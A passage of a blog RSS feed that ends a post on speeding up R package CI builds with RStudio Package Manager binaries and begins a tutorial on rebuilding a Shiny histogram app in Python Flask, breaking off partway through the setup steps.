&lt;p&gt;If you are using R, then the current most popular CI pipeline is &lt;a href="https://travis-ci.org/" rel="external"&gt;Travis CI&lt;/a&gt;, but there’s also &lt;a href="https://www.jenkins.io/" rel="external"&gt;Jenkins&lt;/a&gt;, GitHub Actions, &lt;a href="https://docs.gitlab.com/ee/ci/" rel="external"&gt;GitLab CI&lt;/a&gt;, &lt;a href="https://circleci.com/" rel="external"&gt;Circle CI&lt;/a&gt; and a few others. They all follow the same idea: start a VM, install your R package, then run a bunch of checks. One obvious bottleneck is the “install your R package” step, as any R package may have a large number of dependencies.&lt;/p&gt;
&lt;p&gt;In a &lt;a href="https://www.jumpingrivers.com/blog/faster-r-package-installation-rstudio/" rel="external"&gt;recent post&lt;/a&gt;, we showed the different ways of speeding up package installation (worth checking this out if you find package installation/updating slow). In this post, we’ll discuss leveraging some of those techniques for our CI pipeline.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-r-packages-travis-github-actions-rstudio"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="rstudio-package-manager-rspm"&gt;RStudio Package Manager (RSPM)&lt;/h3&gt;
&lt;p&gt;The &lt;a href="https://rstudio.com/products/package-manager/" rel="external"&gt;RStudio package manager&lt;/a&gt; is perhaps the easiest way of speeding up your CI process. RSPM provides precompiled binaries for CRAN packages, which should ensure a faster install. To test this I made a simple package, with no functions, but a dependency on the {tidyverse}, i.e. &lt;code&gt;Imports: tidyverse&lt;/code&gt; in the DESCRIPTION file. Then I started two Travis CI jobs. The first had a &lt;code&gt;.travis.yml&lt;/code&gt; file&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;language: r
cache: packages
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The total time for this travis job was around twelve minutes.&lt;/p&gt;
&lt;p&gt;The second job had the same two lines, but also an additional &lt;code&gt;before_install:&lt;/code&gt; section&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;before_install:
- echo &amp;#34;options(repos = c(CRAN = &amp;#39;https://packagemanager.rstudio.com/all/__linux__/xenial/latest&amp;#39;))&amp;#34; &amp;gt;&amp;gt; ~/.Rprofile.site
- echo &amp;#34;options(HTTPUserAgent = paste0(&amp;#39;R/&amp;#39;, getRversion(), &amp;#39; R (&amp;#39;,
paste(getRversion(), R.version[&amp;#39;platform&amp;#39;], R.version[&amp;#39;arch&amp;#39;], R.version[&amp;#39;os&amp;#39;]),
&amp;#39;)&amp;#39;))&amp;#34; &amp;gt;&amp;gt; ~/.Rprofile.site
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;While this looks complicated, it is actually fairly simple. The first line adds the RStudio binary package repository to the R profile file, &lt;code&gt;~/.Rprofile.site&lt;/code&gt;. The second adds an &lt;code&gt;HTTPUserAgent&lt;/code&gt; option to the same file, so that packages installed via &lt;code&gt;Rscript&lt;/code&gt; also use the binary package versions. These few lines cut the Travis build time from around 12 minutes to under 4 minutes.&lt;/p&gt;
&lt;p&gt;The above is an incredibly easy way to speed up your CI steps and works with other CI systems. If you use GitHub Actions, then this has already been &lt;a href="https://github.com/r-lib/actions/blob/c2687dac11bca64e304f295084aa58050d90811d/.github/workflows/check-full.yaml#L24" rel="external"&gt;implemented&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;A couple of things to note:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The above code is for Ubuntu 16.04 (Xenial). If you are using Ubuntu 18.04 (Bionic), replace &lt;code&gt;xenial&lt;/code&gt; with &lt;code&gt;bionic&lt;/code&gt; in the repository URL&lt;/li&gt;
&lt;li&gt;There are a few &lt;a href="https://docs.rstudio.com/rspm/admin/binaries.html#binary-packages" rel="external"&gt;different OSs&lt;/a&gt; available for RSPM&lt;/li&gt;
&lt;li&gt;If you are interested in using the RSPM in your own organisation, give us a shout - we’re RStudio Partners.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="other-methods"&gt;Other methods&lt;/h2&gt;
&lt;p&gt;There are three other possibilities for reducing your CI time.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The first is similar to the RStudio Package Manager in that it uses binary builds, but this time we use the Ubuntu versions provided by Michael Rutter. The general idea is to add a new Ubuntu package repository, then install packages via &lt;code&gt;apt install r-cran-*&lt;/code&gt;. Details are available at &lt;a href="https://cran.r-project.org/bin/linux/ubuntu/" rel="external"&gt;CRAN&lt;/a&gt;. Also see &lt;a href="http://dirk.eddelbuettel.com/blog/2020/06/22/#027_ubuntu_binaries" rel="external"&gt;Dirk Eddelbuettel’s&lt;/a&gt; recent blog post and YouTube video for even more details.&lt;/li&gt;
&lt;li&gt;Alternatively, we could use the &lt;code&gt;ccache&lt;/code&gt; trick, where we store compiled files to be reused in the next build. This requires a little more work, but it has already been done by &lt;a href="https://pat-s.me/post/using-ccache-to-speed-up-r-package-checks-on-travis-ci/" rel="external"&gt;Patrick Schratz&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Parallel builds using the &lt;code&gt;Ncpus&lt;/code&gt; argument of &lt;code&gt;install.packages()&lt;/code&gt; typically don’t work on most CI systems, as the (free) VM will only have a single core.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-packages-travis-github-actions-rstudio/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Recreating a Shiny App with Flask</title><link>https://www.jumpingrivers.com/blog/r-shiny-python-flask/</link><pubDate>Tue, 21 Apr 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-shiny-python-flask/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-python-flask/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-shiny-python-flask/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;So &lt;a href="https://blog.rstudio.com/2020/04/02/rstudio-connect-1-8-2/" rel="external"&gt;RStudio Connect&lt;/a&gt; has embraced Python and now runs &lt;a href="https://flask.palletsprojects.com/en/1.1.x/" rel="external"&gt;Flask&lt;/a&gt; applications! At &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt; we make a lot of use of R, shiny, and Python for creating visual tools for our clients. Shiny has a lot of nice features; in particular, it is very fast for prototyping web applications. During our morning meeting we discussed the fact that flask will soon be coming to RStudio products and wondered how easy it would be to recreate one of the simple shiny examples as a flask application. As I suggested it, I got the job of playing about with flask for an hour to recreate the faithful eruptions histogram shiny demo; the finished result is hosted on our &lt;a href="https://jr-demo.jmpr.io/hello-flask/" rel="external"&gt;Connect&lt;/a&gt; server. You do not need to know shiny to follow this post, but I will refer to it in various places.&lt;/p&gt;
&lt;h2 id="spoiler"&gt;Spoiler&lt;/h2&gt;
&lt;p&gt;Shiny and flask are different tools with different strengths. If you have a simple shiny application, shiny is by far the quicker tool to get the job done and requires less knowledge about web based technologies. However, flask gives us much greater flexibility than could easily be achieved in shiny.&lt;/p&gt;
&lt;p&gt;I’m hoping that this will turn into a series of blog posts about flask for data science applications.&lt;/p&gt;
&lt;p&gt;With that in mind, let’s treat this as an exercise in creating a simple flask application for visualising some data with a little interactivity. For reference, the shiny application I am referring to can be viewed alongside the &lt;a href="https://shiny.rstudio.com/tutorial/written-tutorial/lesson1/" rel="external"&gt;tutorial&lt;/a&gt; on how to build it.&lt;/p&gt;
&lt;img class="image-center" src="2020-hello-flask-full.png" style="width:500px; class:image-center"&gt;
&lt;h2 id="what-is-flask"&gt;What is Flask?&lt;/h2&gt;
&lt;p&gt;Flask is a micro web framework written in Python with a wealth of extensions for things like authentication, form validation and ORMs. It provides the tools to build web based applications. Whilst it is very light, combined with the extensions it is very powerful. This means that your web application might be a simple API to a machine learning model that you have created, or a full web application. Pinterest and LinkedIn, for example, use flask.&lt;/p&gt;
&lt;h2 id="set-up-your-app"&gt;Set up your app&lt;/h2&gt;
&lt;p&gt;First, create a directory structure in which to house your project. We can quickly create a project root and the other necessary directories in one command. We will explain the purpose of each directory shortly.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mkdir -p app_example/&lt;span style="color:#ff7b72;font-weight:bold"&gt;{&lt;/span&gt;static,templates,data&lt;span style="color:#ff7b72;font-weight:bold"&gt;}&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; cd app_example
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I highly recommend setting up a virtual environment for every Python project. There are a number of tools for managing virtual environments in Python, but I tend to use &lt;code&gt;virtualenv&lt;/code&gt;. We can create a new virtual environment for this project in the current directory and activate it.&lt;/p&gt;
&lt;p&gt;In 2020 it should also go without saying that we are using Python 3 for this activity, specifically 3.7.3.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;virtualenv venv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source venv/bin/activate
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="other-directories"&gt;Other directories&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;data:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;For our project, we will also want somewhere to house the data. Since we are talking about a very small tabular dataset of 2 variables and 272 cases, any sort of database would be overkill. So we will just read from a csv on disk. We can create this data set via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Rscript -e &lt;span style="color:#a5d6ff"&gt;&amp;#34;readr::write_csv(faithful, &amp;#39;data/faithful.csv&amp;#39;)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;templates:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The visual elements of the flask application will be web pages rendered from html templates. The name &lt;code&gt;templates&lt;/code&gt; is chosen specifically here as it is the default directory that your flask app will look for when trying to render web pages.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;static:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This will be our place to store any static assets, like CSS style sheets and JavaScript code.&lt;/p&gt;
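&lt;p&gt;If you would rather create the layout from Python than from the shell, the following is a minimal sketch using only the standard library. The helper name &lt;code&gt;create_layout&lt;/code&gt; is hypothetical and not part of the original app; the directory names are the ones used in the &lt;code&gt;mkdir&lt;/code&gt; command earlier. It runs in a temporary directory so that nothing is left behind.&lt;/p&gt;

```python
from pathlib import Path
import tempfile

# Sub-directories used in this post; names match the earlier mkdir command.
SUBDIRS = ("static", "templates", "data")


def create_layout(root):
    """Create the project root and its sub-directories, returning the root.

    Hypothetical helper for illustration only.
    """
    root = Path(root)
    for name in SUBDIRS:
        # parents=True also creates the root; exist_ok=True makes reruns safe
        (root / name).mkdir(parents=True, exist_ok=True)
    return root


# Demonstrate in a throwaway directory so nothing is left on disk.
with tempfile.TemporaryDirectory() as tmp:
    project = create_layout(Path(tmp) / "app_example")
    print(sorted(p.name for p in project.iterdir()))
```

&lt;p&gt;Because &lt;code&gt;exist_ok=True&lt;/code&gt; is set, calling the helper a second time on the same root is harmless, much like &lt;code&gt;mkdir -p&lt;/code&gt;.&lt;/p&gt;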
&lt;h3 id="packages"&gt;Packages&lt;/h3&gt;
&lt;p&gt;For this project we will need some Python packages:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;{flask} (obviously)&lt;/li&gt;
&lt;li&gt;{pandas} - useful for data manipulation, but in this case just used to read data from disk&lt;/li&gt;
&lt;li&gt;{numpy} - we will use for calculating the histogram bins and frequencies&lt;/li&gt;
&lt;li&gt;{plotly} - my preferred graphics library in Python at the moment and well suited to web based applications&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install flask pandas plotly numpy
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="choosing-your-editor"&gt;Choosing your editor&lt;/h2&gt;
&lt;p&gt;My editor of choice for anything that is not R related is VS Code, which I find particularly suitable for applications that are created using a mixture of different languages. There are lots of plugins for Python, HTML, CSS and JavaScript that provide code completion, snippets, linting and terminal execution, which means I can write, test and run all the parts of my application from the comfort of one place.&lt;/p&gt;
&lt;h2 id="hello-flask"&gt;Hello Flask&lt;/h2&gt;
&lt;p&gt;With everything set up we can start on our Flask application. One of the things that I really like about flask is the simple syntax for adding URL endpoints to our site. We can create a “hello world” style example with the following Python code (saved in this case in &lt;code&gt;app.py&lt;/code&gt;)&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# required imports&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;flask&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Flask
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# instantiate the application object&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Flask(&lt;span style="color:#79c0ff"&gt;__name__&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# create an endpoint with a decorator&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app.route&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;/&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;hello&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello World&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;__name__&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;__main__&amp;#34;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;run()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Back in the terminal we could run this app with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python app.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and view at the default URL of &lt;code&gt;localhost:5000&lt;/code&gt;. I think the interesting part of the above code snippet is the route decorator&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app.route&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;/&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Routes refer to the URL patterns of our web application. The &lt;code&gt;&amp;quot;/&amp;quot;&lt;/code&gt; is effectively the root route, i.e. what you would see at a web address like “mycoolpage.com”. The decorator here allows us to specify a Python function (a handler) that should run when a user navigates to a particular URL within our domain name.&lt;/p&gt;
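&lt;p&gt;To make the idea of a route decorator more concrete, here is a toy sketch written with plain Python only. It is not how Flask is implemented; the &lt;code&gt;ToyApp&lt;/code&gt; class, its &lt;code&gt;dispatch&lt;/code&gt; method and the &lt;code&gt;/about&lt;/code&gt; endpoint are all made up for illustration. It only shows the general pattern: the decorator records which function handles which URL path, and a lookup later calls the matching handler.&lt;/p&gt;

```python
# A toy router, NOT Flask's implementation: it only illustrates how a
# decorator can associate a URL path with a handler function.


class ToyApp:
    def __init__(self):
        self.routes = {}  # maps URL path to handler function

    def route(self, path):
        """Return a decorator that registers the decorated function for path."""
        def decorator(func):
            self.routes[path] = func
            return func  # the function itself is left unchanged
        return decorator

    def dispatch(self, path):
        """Call the handler registered for path, or return a 404-style message."""
        handler = self.routes.get(path)
        if handler is None:
            return "404 Not Found"
        return handler()


app = ToyApp()


@app.route("/")
def hello():
    return "Hello World"


@app.route("/about")  # hypothetical second endpoint, not part of the post's app
def about():
    return "About this site"


print(app.dispatch("/"))
print(app.dispatch("/about"))
print(app.dispatch("/missing"))
```

&lt;p&gt;A real framework does far more (URL variables, HTTP methods, request and response objects), but the registration step is the part that the decorator syntax hides.&lt;/p&gt;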
&lt;h2 id="what-our-app-needs"&gt;What our app needs&lt;/h2&gt;
&lt;p&gt;We are creating an application here that allows users to choose an input via a slider, which causes a histogram to redraw. For this, our app will need two routes&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A route for generating the histograms&lt;/li&gt;
&lt;li&gt;An HTML page that the user will see&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="creating-a-histogram"&gt;Creating a histogram&lt;/h3&gt;
&lt;p&gt;We could write a function which will draw a histogram using {plotly} fairly easily.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# imports&lt;/span&gt;
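&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;np&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; read_csv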
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotly.express&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# read data from disk&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;faithful &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; read_csv(&lt;span style="color:#a5d6ff"&gt;&amp;#39;./data/faithful.csv&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;hist&lt;/span&gt;(bins &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;30&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# calculate the bins&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; faithful[&lt;span style="color:#a5d6ff"&gt;&amp;#39;waiting&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; counts, bins &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;histogram(x, bins&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;linspace(np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;min(x), np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;max(x), bins&lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bins &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; (bins[:&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; bins[&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;:])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; p &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; px&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;bar(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;bins, y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;counts,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Histogram of waiting times&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; labels&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;x&amp;#39;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#39;Waiting time to next eruption (in mins)&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;y&amp;#39;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#39;Frequency&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; template&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;simple_white&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; p
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This is the sort of thing we might create outside of the web application context for visualising this data. If you want to see the plot you might do something like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; hist()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;show()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;However we want to make some modifications for use in our web application.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;We want to turn our work into a flask application. We can start by adding the required imports and structure to our &lt;code&gt;app.py&lt;/code&gt; with the &lt;code&gt;hist&lt;/code&gt; function in it.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;flask&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Flask
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# other imports&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# instantiate app&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Flask(&lt;span style="color:#79c0ff"&gt;__name__&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# At the end of our script&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;__name__&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;__main__&amp;#39;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;run()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
